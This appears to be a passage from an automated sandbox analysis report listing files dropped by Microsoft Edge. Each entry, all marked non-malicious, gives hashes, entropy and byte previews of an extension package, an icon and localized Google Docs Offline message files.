                                                                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
